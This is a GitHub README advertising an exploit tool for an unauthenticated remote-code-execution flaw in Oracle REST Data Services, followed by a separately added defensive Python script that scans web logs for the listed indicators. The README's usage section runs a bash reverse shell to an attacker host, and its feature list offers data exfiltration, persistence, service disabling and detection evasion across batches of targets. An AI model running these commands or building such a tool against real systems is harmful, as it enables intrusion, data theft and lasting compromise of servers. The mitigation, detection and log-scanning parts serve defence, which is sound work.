fangbarristerbar/CVE-2026-46840-ORDS-RCE

GitHub: fangbarristerbar/CVE-2026-46840-ORDS-RCE

Stars: 0 | Forks: 0

# CVE-2026-46840 - Oracle ORDS Unauthenticated RCE via REST Backend

## Overview

Remote code execution in Oracle REST Data Services (ORDS) Backend-as-a-Service. Allows unauthenticated attackers to achieve full system takeover over HTTPS. Chainable with scope change to adjacent Oracle products (DB, APEX, Fusion Middleware). Stable on 24.2.0-26.1.0. Bypasses default auth and rate limiting through a deserialization path in the request processor.

## Affected Versions

- Oracle REST Data Services 24.2.0 - 26.1.0 (all platforms)
- Confirmed on standalone, WebLogic, Tomcat deployments

## Root Cause

Flawed handling of custom REST handler registration combined with unsafe Jackson deserialization in the endpoint router. Attacker-controlled JSON triggers a gadget chain leading to arbitrary class loading and command execution under the ORDS process user (usually oracle/tomcat).

## Usage

```
python3 CVE-2026-46840.py -t https://target/ords -c "whoami"
python3 CVE-2026-46840.py -t https://target/ords -c "bash -i >& /dev/tcp/attacker/4444 0>&1"
```

**Features:**

- Full shell access (reverse TCP, interactive)
- Data exfil module (dump schemas via ORDS metadata)
- Service disable/persistence options
- Proxy + custom User-Agent + TLS fingerprint evasion
- Batch mode for multiple targets

**Requirements:**

- Python 3.9+
- requests, urllib3, colorama

## Mitigation / Workaround

Upgrade to 26.2+ immediately. Temporary: restrict /ords/* to trusted IPs only, disable public REST endpoints, monitor for anomalous POSTs to handler registration paths.

## Detection

- Unusual 200 responses on /ords/.../metadata-catalog with large JSON
- Process creation under ORDS user (cmd.exe, bash, nc)
- YARA: strings related to known gadget chains (ObjectMapper, TemplatesImpl)
- Network: high volume of POSTs with application/json containing "java." classes

## Disclaimer

For authorized penetration testing and red team operations only.

## Contact

fangbarristerbar@proton.me
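As an added defender-side example that is not part of this repository, the following Python flags web-server log lines matching two of the Detection indicators listed above: POSTs with application/json bodies naming fully qualified `java.*` classes, and large 200 JSON responses on `metadata-catalog` paths. The tab-separated log format, the sample lines and the 1 MB "large JSON" threshold are assumptions constructed for this example.

```python
import re

# Assumed (constructed) tab-separated log format:
# client_ip  timestamp  method  path  status  resp_bytes  content_type  body_excerpt
FIELDS = 8
JAVA_CLASS_RE = re.compile(r"\bjava\.[A-Za-z_][\w.$]*")  # e.g. java.util.HashMap
LARGE_JSON_BYTES = 1_000_000  # assumed threshold for an "unusually large" JSON reply

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    "10.0.0.5\t2026-04-01T10:00:01Z\tGET\t/ords/hr/employees/\t200\t812\tapplication/json\t",
    "10.0.0.9\t2026-04-01T10:00:02Z\tPOST\t/ords/hr/metadata-catalog/\t200\t410\t"
    "application/json\t{\"@class\":\"java.util.HashMap\"}",
    "10.0.0.9\t2026-04-01T10:00:03Z\tGET\t/ords/hr/metadata-catalog/\t200\t2500000\t"
    "application/json\t",
    "10.0.0.5\t2026-04-01T10:00:04Z\tPOST\t/ords/hr/employees/\t201\t120\t"
    "application/json\t{\"name\":\"Java Smith\"}",
]


def classify(line):
    """Return the names of the README indicators a single log line matches."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != FIELDS:
        return ["unparsed"]
    _ip, _ts, method, path, status, resp_bytes, ctype, body = parts
    hits = []
    if not path.startswith("/ords/"):
        return hits
    is_json = ctype.startswith("application/json")
    # Indicator: POST carrying application/json that names java.* classes
    if method == "POST" and is_json and JAVA_CLASS_RE.search(body):
        hits.append("json-java-class")
    # Indicator: 200 on a metadata-catalog path with an unusually large JSON body
    if (status == "200" and "metadata-catalog" in path and is_json
            and int(resp_bytes) >= LARGE_JSON_BYTES):
        hits.append("large-metadata-catalog")
    return hits


def scan(lines):
    """Map the index of every flagged line to the indicators it matched."""
    return {i: h for i, l in enumerate(lines) if (h := classify(l))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(f"line {idx}: {', '.join(hits)}")
```

The lowercase `java.` plus dotted-identifier pattern keeps ordinary values such as a surname "Java" from matching; tune the byte threshold to the baseline size of your own metadata-catalog responses.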